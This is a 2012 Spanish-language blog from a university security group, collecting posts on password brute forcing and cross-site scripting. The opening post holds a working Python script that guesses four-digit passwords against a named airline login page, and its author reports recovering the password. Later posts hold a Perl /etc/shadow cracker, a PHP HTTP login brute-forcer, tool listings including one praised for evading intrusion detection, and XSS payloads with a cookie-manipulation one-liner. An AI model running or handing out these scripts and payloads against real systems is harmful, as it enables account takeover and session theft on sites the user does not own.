sábado, 26 de mayo de 2012

Python brute force

Para acelerar el proceso de brute forcing utilicé el primer script en mi PC y el otro lo ejecuté en un servidor shell que tengo en el mundo exterior con Python instalado, por lo que en menos de 50 minutos la contraseña estaba en mis manos.
import urllib
import urllib2
import md5
import random
import time
 
abc = "0123456789";
url = "http://aerolinea.vuelefeliz.com/login"
new_passwd = 0
 
for i1 in range(0, len(abc)):
        var0 = abc[i1]
        for i2 in range(0, len(abc)):
                var1 = abc[i2]
                for i3 in range(0, len(abc)):
                        var2 = abc[i3]
                        for i4 in range(0, len(abc)):
                                var3 = abc[i4]
                                passwd = var0 + var1 + var2 + var3
                                print "- Password: " + passwd
                                try:
                                        values={'Aer_Id':'MTYyMA==', #esto es el usuario cifrado con md5
                                        'Aer_Passwd':md5.new(passwd).digest().encode("hex")} #password tambien cifrada con md5
                                        print "- Aer_Passwd: " + md5.new(passwd).digest().encode("hex")
 
                                        data = urllib.urlencode(values)
                                        req = urllib2.Request(url, data)
                                        response = urllib2.urlopen(req)
 
                                        html = response.read()
                                        if(html.find("Login was unsuccessful") > 0):
                                                print "Nothing of nothing...\n"
                                        else:
                                                #si encuentra la password la guarda en un archivo llamado passwd_found
                                                print "Password found!\n"
                                                arch = open("passwd_found", "w")
                                                arch.write(passwd)
                                                arch.close()
                                                exit()
                                except:
                                        print "Error...\n"

Bruteforce perl

Bruteforce Password Recovery

Written by Tony Bhimani
August 6, 2004

Requirements
*nix based Operating System
Perl 5.6.1 or higher & these modules
• Getopt::Std
• Crypt::PasswdMD5

Download the source code: bruteforce.tar.gz

I have been using Perl for roughly six months, so it is still very new to me. In an attempt to sharpen my skills I sat down and thought about a nifty utility I could write. I decided upon a utility to recover lost passwords. Of course I could always change the password as root, but where's the fun in that? This script performs brute force attempts at recovering a md5 crypted password which you can find in /etc/shadow.

I have only tested this on RedHat 7.3 and cannot confirm nor deny that it will work on other distributions. FreeBSD may do the encryption differently than Fedora and so on. So my advice is if you try and recover a password, run the bruteforce script on the system your recovering the password from.

Here is a line from an example /etc/shadow file.

someuser:$1$Ua/y3BAI$2mzjA3mqUxqw07CmvdR7v.:12627:0:99999:7:::

The md5 crypt password is $1$Ua/y3BAI$2mzjA3mqUxqw07CmvdR7v.

The salt is after the second $ and the encrypted password is after the third $.

salt        = Ua/y3BAI  crypted pwd = 2mzjA3mqUxqw07CmvdR7v.

To have bruteforce recover the password, you would execute it like so.

./bruteforce -v Ua/y3BAI 2mzjA3mqUxqw07CmvdR7v.

After it does some crunching it would find (after a very long time) the password and display it.

This may take a very long time...please be patient
Found the password -> 123456

So someuser has a password of 123456.

Let's take a look at some code snippets.

# define our alphabet (later I may put this in a text file so the user can change it if they want)  $alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".              " `~!@#\$%^&*()-_=+[{]}\\|;:'\",<.>/?";        # get the salt and encrypted password  $encSalt = $ARGV[0];  $encPass = $ARGV[1];    # build the encrypted password for comparisons  $crypted_password = "\$1\$$encSalt\$$encPass";    # number of attempts at guessing the password  $attempts = 0;    # this  our starting point  print "This may take a very long time...please be patient\n\n";  while (1) {    $bfpass = bruteforce($alphabet, $options{p});    $attempts++;    # if verbose is turned on, display the current password attempt    if ($options{v}) {      print "$bfpass  attempt # $attempts\r";    }    # check if the encrypted passwords match...if so then we found it!    if (unix_md5_crypt($bfpass, $encSalt) eq $crypted_password) {      print "Found the password -> $bfpass\n";      print "It took $attempts attempt(s)\n";      last;    }  }

The while loop is where the script starts and stays till it finds the right password. The bruteforce function's job is to generate the next password sequence using the supplied alphabet. Once bruteforce is done generating the password it returns it as a string. That generated password is then passed to the unix_md5_crypt function available from the Crypt::PasswdMD5 module. A comparison is made between the crypted password supplied from the command line and the crypted generated password. If they match then the correct password has been found and it is displayed to the user and the while loop ends. If the crypted passwords do not match, then the loop starts over and the next password sequence is generated, crypted, and compared.

sub bruteforce {    @tmpPWD = ();        ($ab,$startPWD) = (shift,shift);      $firstChar = substr($ab, 0, 1);      $lastChar = substr($ab, length($ab) - 1, 1);        # start with an assigned password from the command line    if ($startPWD ne "" && $currentPWD eq "") {      $currentPWD = $startPWD;      return $currentPWD;    }          # no password so start with the first character in our alphabet    if ($currentPWD eq "") {      $currentPWD = $firstChar;      return $currentPWD;    }        # if the current password is all of the last character in the alphabet    # then reset it with the first character of the alphabet plus 1 length greater    if ($currentPWD eq fillString(length($currentPWD), $lastChar)) {      $currentPWD = fillString(length($currentPWD) + 1, $firstChar);      return $currentPWD;    }        # convert the password to an array    @tmpPWD = split(//, $currentPWD);        # get the length of the password - 1 (zero based index)    $x = @tmpPWD - 1;          # this portion adjusts the characters    # we go through the array starting with the end of the array and work our way backwords    # if the character is the last one in the alphabet, we change it to the first character    # then move to the next array character    # if we aren't looking at the last alphabet character then we change the array character    # to the next higher value and exit the loop    while (1) {      $iTemp = getPos($ab, $tmpPWD[$x]);          if ($iTemp == getPos($ab, $lastChar)) {        @tmpPWD[$x] = $firstChar;        $x--;      } else {              @tmpPWD[$x] = substr($ab, $iTemp + 1, 1);        last;      }    }        # convert the array back into a string and return the new password to try    $currentPWD = join("", @tmpPWD);          return $currentPWD;  }

The bruteforce function is the brains of the operation. It iterates through the alphabet and generates the next password in the sequence. It accepts two arguments: the alphabet string and a start password. The start password defines a starting point to generate from. This is useful in case we want to split the task of recovering a single password across multiple machines (distribute the load if you will). For example, we could have one machine start from a empty password to "????" and another start from "aaaaa" to "?????????" and so on. This speeds up the recover process.

The code is very straightforward. We get the first and last characters from the alphabet and store those in variables. Then test to see if a start password is defined and if it is to return that. Next we test for an empty password and start with the first character of the alphabet. If the password contains all end alphabet characters, then the password is resized for one extra character and filled entirely with the first character of the alphabet. The password is then converted to an array and the size of the array - 1 is stored in a variable. This variable controls the position within the array as we step through it. We enter another while loop and its job is to increment each character starting from the end of the string. If the array character is the same as the end character of the alphabet, then we change it to the first character and decrement our index by 1 (effectively moving backwards through the array). If the array character is not the same as the last character, then we change it to the next character in the alphabet and exit the loop. The array is converted back into a string and returned by bruteforce.

In plain English, starting with "a" it moves up to "?". It sees the "?" as the last alphabet character and resizes the string to its current length + 1 and changes it to "aa". "aa" eventually gets to "a?" and changes the "?" to "a" and changes the starting "a" to "b" to become "ba", etc... It's the same as counting numbers and carrying them over. If you count from 0 to 9 and next comes 10. After so many iterations you reach 99 and then comes 100. It's the same concept.

The code is available for download from the link at the top of the page. Be sure to chmod it to 755 so it will execute. Enjoy!

fireforce

Fireforce is a Firefox extension designed to perform brute-force attacks on GET and POST forms. Fireforce can use dictionaries or generate passwords based on several character types. Attacks can be performed on fields using two distinct password sources..

https://addons.mozilla.org/es-es/firefox/addon/fireforce/

brutus

There are dozens of offline passwords crackers for most password-protected resources. Those crackers are designed to find weak passwords and let the administrator know how safe his resources really are. Brutus is a different kind of password cracker. It works online, trying to break telnet, POP3, FTP, HTTP, RAS or IMAP by simply trying to login as a legitimate users. Brutus imitates a real outside attack (unlike other password cracking applications that simulate an internal attack) and thus serves as a valuable security-auditing tool. Brutus can run in single user mode (trying to break into a single user's account by trying different password combinations) or by trying a list of user/password combinations from a word file. The application scans the host for known services and can be easily customized to break-in any other custom service requiring interactive logon of a username and a password. Using Brutus will teach you a lot about your system, since it simulates a real attack. To make a good use of Brutus's attack simulation an administrator should that note whether the break-in attempts are logged, and whether a timeout is issued after a few failed logins - this can be easily seen by the progress Brutus is making.

http://www.hoobie.net/brutus/

TSGrinder

TSGrinder is the first production Terminal Server brute force tool. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. And having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts. It is a "dictionary" based attack tool, but it does have some interesting features like "l337" conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection. Platform: Windows

TSGrinder

THC-Hydra

This tool allows for rapid dictionary attacks against network login systems, including FTP, POP3, IMAP, Netbios, Telnet, HTTP Auth, LDAP NNTP, VNC, ICQ, Socks5, PCNFS, and more. It includes SSL support and is apparently now part of Nessus.

THC-Hydra

 

Grupo de seguridad Informatica

Grupo de seguridad Informatica ULATINA costa rica

Current email address: GSICR@googlegroups.com
Este documento:        http://goo.gl/xfomb
Grupo FB:                 http://goo.gl/elWL0
Fan page FB:         goo.gl/h6EB9
Grupo google:         http://goo.gl/hNC5Z
Carpeta google docs: http://goo.gl/IslSG
Sugerencias:        goo.gl/5lB9v
Objetivos:
- Introducir a los participantes en los conceptos basicos sobre seguridad informatica.
        +Hacking Ético
        +Recabar Información
        +Ingeniería Social
        +Introducción a Fuerza Bruta
        +Aplicaciónes Web y vulnerabilidades web (xss,rfi,etc)
        +Inyección de código SQL
        +Comandos Linux
        +Servidores Windows
        +Introducción a las Botnets
        +Metodologías y Normativas (312) (Invitado especial un abogado )
        +Metasploit y una revision al grupo( por Invitado especial desde PERU xsstorm)
Reunion        Temas                                                        
1.                Hackers                                
                        Explicacion,Definiciones,White Hacker,Black hacker,Cracker,Espionaje
2.                Recabar Información                        
3.                Introducción Ingeniería Social        
4.                Introducción Fuerza Bruta
5                Introducción Vulnerabilidades web                
                        XSS,SQLI,RFI
4                Introducción  Inyección de código SQL
5.                Comandos Linux        
6.                Servidores Windows
7                Introducción Botnets        
8.                Metodologías y Normativas
9.                Metasploit

viernes, 25 de mayo de 2012

Que es XSS , Cross-site scripting


Que es xss
View more presentations from jamesjara.

 GSI-CR XSS
TECNICA XSS
Cross-site scripting

XSS, del inglés Cross-site scripting es un tipo
de inseguridad informática o agujero de
seguridad típico de las aplicaciones Web, que
permite a una tercera parte inyectar código
JavaScript en páginas web vistas por el
usuario, evitando medidas de control como la
Política del mismo origen.

DONDE SE ENCUENTRA ESTOS
ERRORES?

Estos errores se pueden encontrar en cualquier aplicación
que tenga como objetivo final, el presentar la información
en un navegador web. No se limita a sitios web, ya que
puede haber aplicaciones locales vulnerables a XSS, o
incluso el navegador en sí. El problema está en que
usualmente no se validan correctamente los datos de
entrada que son usados en cierta aplicación. Esta
vulnerabilidad puede estar presente de forma directa
(también llamada persistente) o indirecta (también
llamada reflejada).

TIPOS DE XSS

Directa (Persistente): este tipo de XSS comúnmente
filtrado, y consiste en embeber código HTML peligroso en
sitios que lo permitan; incluyendo así etiquetas como
<script> o <iframe>.
Indirecta (Reflejada): este tipo de XSS consiste en
modificar valores que la aplicación web utiliza para pasar
variables entre dos páginas, sin usar sesiones y sucede
cuando hay un mensaje o una ruta en la URL del
navegador, en una cookie, o cualquier otra cabecera HTTP
(en algunos navegadores y aplicaciones web, esto podría
extenderse al DOM del navegador).

XSS Indirecto (reflejado)

Supongamos que un sitio web tiene la siguiente forma:
http://www.example.com/home.asp?frame=menu.asp
y que al acceder se creará un documento HTML enlazando con un frame a menu.asp.
En este ejemplo, ¿qué pasaría si se pone como URL del frame un código javascript?
javascript:while(1)alert("Este mensaje saldra indefinidamente");
Si este enlace lo pone un atacante hacia una víctima, un visitante podrá verlo y verá que es del
mismo dominio, suponiendo que no puede ser nada malo y de resultado tendrá un bucle infinito de
mensajes.
Un atacante en realidad trataría de colocar un script que robe las cookies de la víctima, para
después poder personificarse como con su sesión, o hacer automático el proceso con el uso de la
biblioteca cURL o alguna similar. De esta forma, al recibir la cookie, el atacante podría ejecutar
acciones con los permisos de la víctima sin siquiera necesitar tu contraseña.
Otro uso común para estas vulnerabilidades es lograr hacer phishing. Quiere ello decir que la
víctima ve en la barra de direcciones un sitio, pero realmente está en otra. La víctima introduce su
contraseña y se la envía al atacante.

XSS Indirecto (reflejado)

Una página como la siguiente:
error.php?error=Usuario%20Invalido
es probablemente vulnerable a XSS indirecto, ya que si escribe en el documento "Usuario Inválido",
esto significa que un atacante podría insertar HTML y JavaScript si así lo desea.
Por ejemplo, un tag como <script> que ejecute código javascript, cree otra sesión bajo otro usuario
y mande la sesión actual al atacante.
Para probar vulnerabilidades de XSS en cookies, se puede modificar el contenido de una cookie de
forma sencilla, usando el siguiente script. Sólo se debe colocar en la barra de direcciones, y
presionar 'Enter'.
javascript:void prompt("Introduce la cookie:",document.cookie).replace(/[^;]+/g,function(_)
{document.cookie=_;});

XSS Directo (persistente)

Funciona localizando puntos débiles en la programación de los filtros de HTML
si es que existen, para publicar contenido (como blogs, foros, etc.).
Normalmente el atacante tratara de insertar tags como <iframe>, o <script>,
pero en caso de fallar, el atacante puede tratar de poner tags que casi
siempre están permitidas y es poco conocida su capacidad de ejecutar
código. De esta forma el atacante podría ejecutar código malicioso.

XSS Directo (persistente)
Ejemplos:
Una posibilidad es usar atributos que permiten ejecutar código.
<BR SIZE="&{alert('XSS')}">
<FK STYLE="behavior: url(http://yoursite/xss.htc);">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
También se puede crear un DIV con background-image: url(javascript:eval
(this.fu)) como estilo y añadir al DIV un campo llamado fu que contenga el
código a ejecutar, por ejemplo:
<div fu="alert('Hola mundo');" STYLE="background-image: url(javascript:eval
(this.fu))">

jueves, 24 de mayo de 2012

Brute force http tool

Gente aqui publico la herramienta de brute force que desarolle para el grupo de hackers/seguridad informatica, osea es del grupo descarguenla los que quieran, ahi esta el tutorial.. vean el codigo ;)
 
- Los que no saben usar SVN(deberian) https://brute-force-http.googlecode.com/svn/trunk/






Brute forcing consists of systematically enumerating all possible candidates for the solution and checking whether each candidate satisfies the problem's statement.

In web applications, we usually find a combination of user ID and password. Therefore, it's possible to carry out an attack to retrieve a valid user account and password, by trying to enumerate many (i.e., dictionary attack) or all the possible candidates.
Discovery Authentication Methods:
Unless an entity decides to apply a sophisticated web authentication, the two most commonly seen methods are as follows:
HTTP Authentication;
Basic Access Authentication Digest Access Authentication
HTML Form-based Authentication;
IN PHP.
Example:
$partytime = new bruteForceHTTP();

$partytime->setDebug(true);

$partytime->setDictionary('dictionary.txt');
// Use this comodin {PASSWORD} 
$partytime->setAccessUrl('http://www.jamesjara.com/?myusername=jamesjara&mypassword={PASSWORD}&Submit=Login');

$partytime->setTimeOut(10);
//if this word match in the result, then you are in
$partytime->setBingoKeyword('Bienvenido');

$partytime->KillerTime();